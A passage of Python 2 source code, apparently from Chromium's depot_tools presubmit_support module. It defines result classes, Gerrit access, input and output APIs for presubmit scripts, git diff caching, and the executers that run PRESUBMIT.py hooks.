"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self, output):
output.write(self._message)
output.write('\n')
for index, item in enumerate(self._items):
output.write(' ')
# Write separately in case it's unicode.
output.write(str(item))
if index < len(self._items) - 1:
output.write(' \\')
output.write('\n')
if self._long_text:
output.write('\n***************\n')
# Write separately in case it's unicode.
output.write(self._long_text)
output.write('\n***************\n')
if self.fatal:
output.fail()
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, host):
self.host = host
self.cache = {}
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
However, API isn't very clear what's inside, so see tests for example.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
# info is a reference to cache. We'll modify it here adding description to
# it to the right patchset, if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].iteritems():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
labelinfo = changeinfo.get('labels', {}).get('Code-Review', {})
values = labelinfo.get('values', {}).keys()
try:
max_value = max(int(v) for v in values)
reviewers = [r for r in labelinfo.get('all', [])
if r.get('value', 0) == max_value]
except ValueError: # values is the empty list
reviewers = []
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r"(^|.*?[\\\/])[^.]+$" to the white list.
# Note that ALL CAPS files are black listed in DEFAULT_BLACK_LIST below.
DEFAULT_WHITE_LIST = (
# C++ and friends
r".+\.c$", r".+\.cc$", r".+\.cpp$", r".+\.h$", r".+\.m$", r".+\.mm$",
r".+\.inl$", r".+\.asm$", r".+\.hxx$", r".+\.hpp$", r".+\.s$", r".+\.S$",
# Scripts
r".+\.js$", r".+\.py$", r".+\.sh$", r".+\.rb$", r".+\.pl$", r".+\.pm$",
# Other
r".+\.java$", r".+\.mk$", r".+\.am$", r".+\.css$", r".+\.mojom$",
r".+\.fidl$"
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_BLACK_LIST = (
r"testing_support[\\\/]google_appengine[\\\/].*",
r".*\bexperimental[\\\/].*",
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r".*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*",
# Output directories (just in case)
r".*\bDebug[\\\/].*",
r".*\bRelease[\\\/].*",
r".*\bxcodebuild[\\\/].*",
r".*\bout[\\\/].*",
# All caps files like README and LICENCE.
r".*\b[A-Z0-9_]{2,}$",
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r"(|.*[\\\/])\.git[\\\/].*",
r"(|.*[\\\/])\.svn[\\\/].*",
# There is no point in processing a patch file.
r".+\.diff$",
r".+\.patch$",
)
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cPickle = cPickle
self.cpplint = cpplint
self.cStringIO = cStringIO
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
# TODO(yyanagisawa): stop exposing this when python3 become default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.marshal = marshal
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.pickle = pickle
self.re = re
self.subprocess = subprocess
self.tempfile = tempfile
self.time = time
self.traceback = traceback
self.unittest = unittest
self.urllib2 = urllib2
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'python'. This is interpreted in CallCommand to
# convert to vpython in order to allow scripts in other repos (e.g. src.git)
# to automatically pick up that repo's .vpython file, instead of inheriting
# the one in depot_tools.
self.python_executable = 'python'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
# TODO(dpranke): figure out a list of all approved owners for a repo
# in order to be able to handle wildcard OWNERS files?
self.owners_db = owners.Database(change.RepositoryRoot(),
fopen=file, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with "base/containers/hash_tables.h" instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
presubmit script. For example, It can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof.
"""
dir_with_slash = normpath("%s/" % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug("LocalPaths: %s", paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn("AffectedTestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return filter(lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self, affected_file, white_list=None, black_list=None):
"""Filters out files that aren't considered "source file".
If white_list or black_list is None, InputApi.DEFAULT_WHITE_LIST
and InputApi.DEFAULT_BLACK_LIST is used respectively.
The lists will be compiled as regular expression and
AffectedFile.LocalPath() needs to pass both list.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, white_list or self.DEFAULT_WHITE_LIST) and
not Find(affected_file, black_list or self.DEFAULT_BLACK_LIST))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return filter(source_file, self.AffectedTestableFiles())
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in "new" version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
Note: The carriage return (LF or CR) is stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
# Compute a single diff for all files and parse the output; should
# with git this is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
# filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
raise PresubmitFailure(
'Unified diff did not contain entry for file %s' % path)
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
Deleted files are not text file."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the "left hand side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the "right hand
side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
return self._cached_new_contents[:]
def ChangedContents(self):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
if self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
self._cached_changed_contents = []
line_num = 0
for line in self.GenerateScmDiff().splitlines():
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
self._cached_changed_contents.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or "tag") lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. "FOO="
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or "tag" lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r"^[A-Z_]*$", attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
footers = []
unsplit_footers = git_footers.parse_footers(self._full_description).get(
'Bug', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a "R:" git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(agable): Remove support for 'Tbr:' when TBRs are programmatically
# determined by self-CR+1s.
footers = git_footers.parse_footers(self._full_description).get('Tbr', [])
return sorted(set(tags + footers))
# TODO(agable): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = filter(file_filter, self._affected_files)
if include_deletes:
return affected
return filter(lambda x: x.Action() != 'D', affected)
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
warn("AffectedTeestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return filter(lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in "new" version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = set([os.path.dirname(f) for f in files])
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
class GetTryMastersExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, project, change):
"""Executes GetPreferredTryMasters() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
project: Project name to pass to presubmit script for bot selection.
Return:
A map of try masters to map of builders to set of tests.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'GetPreferredTryMasters'
if function_name not in context:
return {}
get_preferred_try_masters = context[function_name]
if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2:
raise PresubmitFailure(
'Expected function "GetPreferredTryMasters" to take two arguments.')
return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, cl, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
cl: The Changelist object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(cl, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.iteritems(),
masters2.iteritems()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.iteritems():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoGetTryMasters(change,
changed_files,
repository_root,
default_presubmit,
project,
verbose,
output_stream):
"""Get the list of try masters from the presubmit scripts.
Args:
changed_files: List of modified files.
repository_root: The repository root.
default_presubmit: A default presubmit script to execute in any case.
project: Optional name of a project used in selecting trybots.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
Return:
Map of try masters to map of builders to set of tests.
"""
presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = {}
executer = GetTryMastersExecuter()
if default_presubmit:
if verbose:
output_stream.write("Running default presubmit script.\n")
fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
results = _MergeMasters(results, executer.ExecPresubmitScript(
default_presubmit, fake_path, project, change))
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results = _MergeMasters(results, executer.ExecPresubmitScript(
presubmit_script, filename, project, change))
# Make sets to lists again for later JSON serialization.
for builders in results.itervalues():
for builder in builders:
builders[builder] = list(builders[builder])
if results and verbose:
output_stream.write('%s\n' % str(results))
return results
def DoPostUploadExecuter(change,
cl,
repository_root,
verbose,
output_stream):
"""Execute the post upload hook.
Args:
change: The Change object.
cl: The Changelist object.
repository_root: The repository root.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
"""
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = []
executer = GetPostUploadExecuter()
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, cl, change))
output_stream.write('\n')
if results:
output_stream.write('** Post Upload Hook Messages **\n')
for result in results:
result.handle(output_stream)
output_stream.write('\n')
return results
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose,
gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
os.chdir(os.path.dirname(presubmit_path))
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
# These function names must change if we make substantial changes to
# the presubmit API that are not backwards compatible.
if self.committing:
